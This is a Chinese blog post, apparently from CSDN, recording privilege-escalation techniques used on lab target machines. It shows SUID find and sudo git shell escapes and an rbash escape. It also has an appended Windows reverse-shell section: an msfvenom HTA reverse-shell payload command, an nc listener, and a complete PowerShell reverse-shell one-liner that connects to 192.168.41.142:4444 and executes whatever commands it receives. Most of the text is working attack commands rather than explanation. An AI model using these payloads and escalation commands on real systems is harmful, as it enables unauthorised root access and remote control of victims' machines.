记录靶机渗透中用到的提权方法

本文介绍了如何通过find命令利用SUID权限提权,git命令获取root权限并隐藏输出,以及rbash环境下的逃逸方法。深入浅出地展示了在信息技术领域的权限管理和安全绕过技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、find提权

(1)首先使用如下命令查看具有suid 权限的可执行二进制程序

find / -perm -4000 -type f 2>/dev/null
或
find / -perm -u=s -type f 2>/dev/null

参数含义参考find基础命令

-perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限
-type:d(目录)f(文件)c(字符设备文件)b(块设备文件)

(2)若find命令在输出结果中,执行如下代码,提权

touch 123.txt
find 123.txt -exec "/bin/sh" \;

2、git提权

(1)首先sudo -l查看可以无需密码以root权限执行的命令
(2)若结果存在git命令,执行以下代码强制进入交互状态,让页面缓冲区无法显示全部信息 (放大字体或将窗口变窄)。

sudo git -p --help 
或
sudo git help config

(3)在末行命令模式输入!/bin/bash完成提权
在这里插入图片描述

3、rbash逃逸

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

如图,代码执行完毕后已经可以切换目录了,说明rbash逃逸成功
在这里插入图片描述
后续持续更新。。。

### Windows 靶机反弹 Shell 和方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问权限之后,下一步通常是试图提升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功提升权限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值